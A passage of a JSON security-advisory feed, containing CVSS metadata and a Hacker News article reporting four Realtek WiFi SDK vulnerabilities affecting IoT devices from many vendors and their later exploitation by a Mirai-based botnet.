"CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MMPC:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:13", "description": "[](<https://thehackernews.com/images/-PiZWCeBTtNg/YRtRHWkDPnI/AAAAAAAADjU/14jyow9NKv8ROnMPT_eVpKuR-OFvSGofACLcBGAsYHQ/s0/wifi.jpg>)\n\nTaiwanese chip designer Realtek is warning of [four security vulnerabilities](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) in three software development kits (SDKs) accompanying its WiFi modules, which are used in almost 200 IoT devices made by at least 65 vendors.\n\nThe flaws, which affect Realtek SDK v2.x, Realtek \"Jungle\" SDK v3.0/v3.1/v3.2/v3.4.x/v3.4T/v3.4T-CT, and Realtek \"Luna\" SDK up to version 1.3.2, could be abused by attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege \u2014\n\n * **CVE-2021-35392** (CVSS score: 8.1) - Heap buffer overflow vulnerability in 'WiFi Simple Config' server due to unsafe crafting of SSDP NOTIFY messages\n * **CVE-2021-35393** (CVSS score: 8.1) - Stack buffer overflow vulnerability in 'WiFi Simple Config' server due to unsafe parsing of the UPnP SUBSCRIBE/UNSUBSCRIBE Callback header\n * **CVE-2021-35394** (CVSS score: 9.8) - Multiple buffer overflow vulnerabilities and an arbitrary command injection vulnerability in 'UDPServer' MP tool\n * **CVE-2021-35395** (CVSS score: 9.8) - Multiple buffer overflow vulnerabilities in HTTP web server 'boa' due to unsafe copies of some overly long parameters\n\n[](<https://thehackernews.com/images/-EIgcKb_iBEk/YRtP5RJMxMI/AAAAAAAADjM/cTEyKOzn0asMcS1ihlaXo5YwzZ7xyMNxQCLcBGAsYHQ/s0/wifi-hack.gif>)\n\nImpacting devices that implement wireless capabilities, the list includes residential gateways, travel routers, WiFi repeaters, IP cameras to smart lightning gateways, or even connected toys from a wide range of manufacturers such as AIgital, ASUSTek, Beeline, Belkin, Buffalo, D-Link, Edimax, Huawei, LG, Logitec, MT-Link, Netis, Netgear, Occtel, PATECH, TCL, Sitecom, TCL, ZTE, Zyxel, and Realtek's own router lineup.\n\n\"We got 198 unique fingerprints for devices that answered over UPnP. If we estimate that each device may have sold 5k copies (on average), the total count of affected devices would be close to a million,\" researchers said.\n\nWhile patches have been released for Realtek \"Luna\" SDK in version 1.3.2a, users of the \"Jungle\" SDK are recommended to backport the fixes provided by the company.\n\nThe security issues are said to have remained untouched in Realtek's codebase for more than a decade, German cybersecurity specialist IoT Inspector, which [discovered](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>) the weaknesses, said in a report published Monday three months after disclosing them to Realtek in May 2021.\n\n\"On the product vendor's end, [...] manufacturers with access to the Realtek source code [...] missed to sufficiently validate their supply chain, [and] left the issues unspotted and distributed the vulnerabilities to hundreds of thousands of end customers \u2014 leaving them vulnerable to attacks,\" the researchers said.\n\n**_Update:_** Three days after details about the Realtek vulnerabilities were revealed, active exploitation attempts have been detected to spread a variant of a Mirai malware and rope the compromised devices into the botnet. The same threat actor behind this Mirai-based botnet has also been linked to a [string of attacks](<https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html>) at least since February 2021, leveraging newly disclosed flaws in network security appliances and home routers to their advantage.\n\n\"This chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly,\" network security firm SAM Seamless Network [said](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) last week. \"These kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-17T06:19:00", "type": "thn", "title": "Multiple Flaws Affecting Realtek Wi-Fi SDKs Impact Nearly a Million IoT Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35392", "CVE-2021-35393", "CVE-2021-35394", "CVE-2021-35395"], "modified": "2021-08-24T04:42:33", "id": "THN:B73C2EFCE2F6E4AC50F5CFFF3165A5C1", "href": "https://thehackernews.com/2021/08/multiple-flaws-affecting-realtek-wi-fi.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}